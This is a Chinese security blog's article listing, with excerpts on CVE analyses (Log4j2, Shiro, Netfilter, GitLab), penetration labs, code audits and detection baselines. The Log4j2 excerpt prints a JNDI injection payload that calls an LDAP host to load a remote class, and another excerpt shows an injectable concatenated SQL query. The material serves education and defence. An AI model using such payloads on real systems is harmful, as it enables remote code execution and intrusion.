自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 关于内核堆溢出漏洞的分析

一、漏洞背景CVE-2021-22555是一个存在了15年之久的内核堆溢出漏洞,它位于内核的Netfilter组件中,这个组件可以被用来实现防火墙、NAT等功能。该漏洞在2006年由commit 9fa492cdc160cd27ce1046cb36f47d3b2b1efa21引入,并在2021年由commit b29c457a6511435960115c0f548c4360d5f4801d修复。利用这个漏洞可以导致目标系统拒绝服务,甚至实现提权、容器逃逸并执行任意代码,危害等级极高

2021-12-31 20:47:27 2137 4

原创 安全攻防-kali内网渗透实战

外网打点首先对web进行端口扫描,发现38080端口和22端口访问一下38080端口发现是一个error page用Wappalyzer看一下是什么架构,但是好像没有检测出来【一>所有资源获取<一】1、200份很多已经买不到的绝版电子书2、30G安全大厂内部的视频资料3、100份src文档4、常见安全面试题5、ctf大赛经典题目解析6、全套工具包7、应急响应笔记8、网络安全学习路线拿着报错去百度上发现应该是springboot索性用goby再去扫一下,应该

2021-12-30 19:41:56 6803

原创 网络安全审计之CMS代码审计

0x00:环境说明Windows 10PhpstubyPhp版本:7.2.9CMS版本:MetInfo7.5.00x01:目录结构|-- about|-- about1|-- admin|-- app|-- cache|-- case|-- config|-- download|-- favicon.ico|-- feedback|-- hits|-- img|-- include|-- index.php|-- install|-- job|-- member

2021-12-29 16:14:11 3327 1

原创 基于kali的域控环境搭建——黑盒测试环境搭建

前言本环境为黑盒测试,在不提供虚拟机帐号密码的情况下进行黑盒测试拿到域控里面的flag。环境搭建攻击机:kali:192.168.1.10靶场:CentOS(内):192.168.93.100CentOS(外):192.168.1.110Ubuntu:192.168.93.120域内主机:Winserver2012:192.168.93.10Winserver2008:192.168.93.20Windows7:192.168.93.30kali跟CentOS能够ping通拓扑

2021-12-28 19:25:34 2350 2

原创 从0到1带你深入理解log4j2漏洞

0x01前言最近IT圈被爆出的log4j2漏洞闹的沸沸扬扬,log4j2作为一个优秀的java程序日志监控组件,被应用在了各种各样的衍生框架中,同时也是作为目前java全生态中的基础组件之一,这类组件一旦崩塌将造成不可估量的影响。从Apache Log4j2 漏洞影响面查询的统计来看,影响多达60644个开源软件,涉及相关版本软件包更是达到了321094个。而本次漏洞的触发方式简单,利用成本极低,可以说是一场java生态的‘浩劫’。本文将从零到一带你深入了解log4j2漏洞。知其所以然,方可深刻理解、有

2021-12-27 19:44:11 6631 12

原创 kali系统之复现漏洞分析与审计

0x00 前言复现这个漏洞的过程中觉得很有分析的必要,而作者源码结合 log 调试分析的这篇文章已经写得比较详尽了,就想自己纯从审计的角度写一下分析巩固一下。总之,如有不当,烦请评论捉虫,我会在第一时间响应并评论提示,谢谢。0x01 简介漏洞成因可构造 uri 使 mod_proxy 请求转发给内部服务器造成 SSRF 。影响版本实验环境代审环节个人建议是亲手编译调试 Apache 跟进,可以参照 P 神的教程:编译调试 Apache调试补充事项不一定要 Ubantu,Kali 上

2021-12-25 17:12:49 1351

原创 mybatis中如何防止sql注入和传参

环境使用mysql,数据库名为test,含有1表名为users,users内数据如下JDBC下的SQL注入在JDBC下有两种方法执行SQL语句,分别是Statement和PrepareStatement,即其中,PrepareStatement为预编译StatementSQL语句SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'当传入数据为username =

2021-12-24 20:37:31 2731 2

原创 apacheunomi漏洞介绍及代码分析

Apache Unomi介绍Apache Unomi具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B测试等功能,可以作为Web CMS、个性化服务、原生移动应用的分析服务、具有分段功能的集中配置文件管理系统、授权管理中心。漏洞介绍CVE-2020-13942是CVE-2020-11975的绕过该漏洞描述的是Unomi针对MVEL表达式(和OGNL表达式)的未进行敏感函数的过滤,直接解析,导致任意代码执行本文主要对MVEL这条利用链做代码层面的分析poc请求包漏洞利用时

2021-12-23 20:59:55 1439

原创 如何成为一名正义黑客?你应该学习什么?

前言这是我的建议如何成为正义黑客(Ethical Hacker),你应该按照下面顺序学习。简要说明第一件事你应该学习如何编程,我建议首先学python,然后是java。(非必须)接下来学习一些算法和数据结构是很有帮助的,它将帮助你更好的编程。一旦你学会如何编程,你应该学习如何用 c 编程。重点关注以下话题:结构体、指针的算术运算、传值调用和引用调用、字符串IO基础、宏、条件编译、程序结构。学习 UNIX 操作系统基础:Unix shells、shell 变量、文件系统、通用Unix 命令、Sh

2021-12-22 20:04:37 12503 43

原创 安全漏洞之任意文件上传漏洞分析

前言X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本也有很多。在这里根据系统代码结合POC来分析一下这个漏洞点。定位漏洞点根据poc中的上传路径可以知道,漏洞点存在于/general/index/UploadFile.php文件。产生漏洞的代码是下边这一串。else if ( $uploadType == "eoffice_logo" ){ $targetPath = $_SERVER['DOCUMENT

2021-12-21 15:03:36 1650

原创 树莓派--搭建蜜罐

前言一是现在自己有本职的事情需要做。二是树莓派本身的硬件实在是有限,很多事情需要自己从0到1进行构建。综合这两个因素,这个系列一定短暂缺更,等有时间了,再将这个系列深入研究下。在此,我们再来梳理一下我们的思路:我们将树莓派3B+刷成了kali系统,作为攻击机我们将树莓派2B刷成了Ubuntu-Server系统,当做环境机本次内容:在环境机上部署安全设备,简单攻防演练下很多东西,你只看到我最后记录了完整的结果,你没看到我是如何从0到1,如何中间排错,如何get新技能了。这些才是

2021-12-20 20:57:57 4354 4

原创 反序列化漏洞原理详解

Apache shiro简介Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。本文针对Shiro进行了一个原理性的讲解,从源码层面来分析了Shiro的认证和授权的整个流程,并在认证与授权的这个流程讲解冲,穿插说明rememberme的作用,以及为何该字段会导致反序列化漏洞。Apache shiro认证在该小节中我们将会详细讲解Shiro是

2021-12-18 21:07:23 2788

原创 百万人都在求的网络安全学习路线《渗透漏洞防御总结》

前言不折腾的网络安全,和咸鱼有什么区别目录二、 前言三 、同源策略 3.1 什么是同源策略 3.2 为什么需要同源策略四 、XSS 4.1 概览 4.2 介绍 4.3 防御五 、CSRF 5.1 概览 5.2 介绍 5.3 防御六、 SQL 注入七 、流量劫持 7.1 DNS 劫持 7.2 HTTP 劫持八 、浏览器网络安全九、 浏览器系统安全十 、参考文献浏览器安全可以分为三大块:Web 页面安全浏览器网络安全浏览器系统安全Web 世界是开放的,任何资

2021-12-17 15:52:28 347

原创 什么是反序列化?反序列化的过程,原理

本篇主要分析java序列化、反序列化的过程,原理,并且通过简化版URLDNS做案例分析利用链原理。

2021-12-16 14:48:59 20206 4

原创 漏洞学习篇:CVE漏洞复现

漏洞原理Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响:版本等于2.4.49<Directory />Require all granted</Directory>(默认情况下是允许被访问的)。攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的

2021-12-13 20:46:08 1498

原创 安全漏洞之Log4j2漏洞复现绕过分析

0x00 介绍Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告分配CVE编号:CVE-2021-44228CVSS评分:10.0(最高只能10分)POC比较简单public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}");}POC虽然简单,但是搭建LDAP环境显得有点复杂,m

2021-12-12 21:16:55 25094

原创 网络安全:记一次安全审计

前言这周利用晚上时间,看了一下wuzhicms,该cms好像已经停更了,源码在官网上给了百度网盘地址,拿来本地搭建审计,分享一下,欢迎师傅们来指导。1. 敏感信息泄露直接后台挂个链接,这个很可以:代码中:【一>所有资源获取<一】1、200份很多已经买不到的绝版电子书2、30G安全大厂内部的视频资料3、100份src文档4、常见安全面试题5、ctf大赛经典题目解析6、全套工具包7、应急响应笔记8、网络安全学习路线2. 两个后台sqli这个应该不止这两个地方

2021-12-10 14:54:53 670

原创 从实习到秋招成为一名安全工程师,我经历了什么

前言借朋友口述总结了安全招聘面试经历分享,希望更多的人看到这篇文,从中得到启发,找到自己心仪的工作。基本情况签了字节的三方,秋招终于告一段落。从八月份边实习边准备秋招到现在,经历了许多,这篇帖总结一下这几个月的努力。本人普通本科网络空间安全科班,没有参加过任何竞赛,也没有论文。主要是大学实在有点混哈哈,不想去参加竞赛。大家不要学我,有竞赛经历会给自身能力和简历增添色彩,还能在面试中得到面试官的好感。所以1有能力就多去参加竞赛,比如CTF竞赛、护网行动等。在大三出去实习的时候找的一个安全渗透的工

2021-12-09 19:01:40 2437

原创 主机入侵检测策略之基线检测

前言由于篇幅限制,本篇文章主要介绍基本的检测,例如特权账户检测、暴力破解和弱口令检测等。文末以Wazuh为例,介绍如何自定义基线检测。基本检测特权账户检测检测规则:通过之前的信息搜集模块搜集到的用户信息,判断是否存在uid=0且用户名不为root的特权账户。代码实现:检查是否存在UID=0的用户(超级用户),系统默认root的UID为0SSuperuser=`more /etc/passwd | egrep -v '^root|^#|^(\+:\*)?:0:0:::'| awk -F: '{

2021-12-08 14:23:54 1058

原创 网络安全之SQL注入深入分析

0x00 前言我们知道代码审计Java的SQL注入主要有两点:参数可控和SQL语句可拼接(没有预编译)。并且我们也清楚修复SQL注入的方式就是预编译,但是可能我们并不清晰内部预编译的具体实现。本文主要从代码层面深入分析三种Java不同数据库框架下的SQL注入以及预编译。0x01 JDBC SQLi不使用占位符拼接情况分析Statement statement = connection.createStatement();String sql = "select * from user where

2021-12-07 16:55:26 1810

原创 安全攻防实战系列MSF

前言在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。环境配置从虚拟机网络来看机器描述攻击机:win10:192.168.1.6kali:192.168.1.10第一层:12server-bt:192.168.1.5192.168.59.133第

2021-12-06 15:49:20 2478

原创 域控安全之域渗透

在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。卷影拷贝服务提取NTDS在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntds\ntds.dit。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,

2021-12-04 14:48:11 1581

原创 安全RCE之未授权访问分析

前言安全研究员vakzz于4月7日在hackerone上提交了一个关于gitlab的RCE漏洞,在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现未授权的在野利用,并发现了新的利用方式。根据官方漏洞通告页面得知安全的版本为13.10.3、13.9.6 和 13.8.8。本篇将复现分析携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的gitlab介绍GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库

2021-12-03 15:59:02 964

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除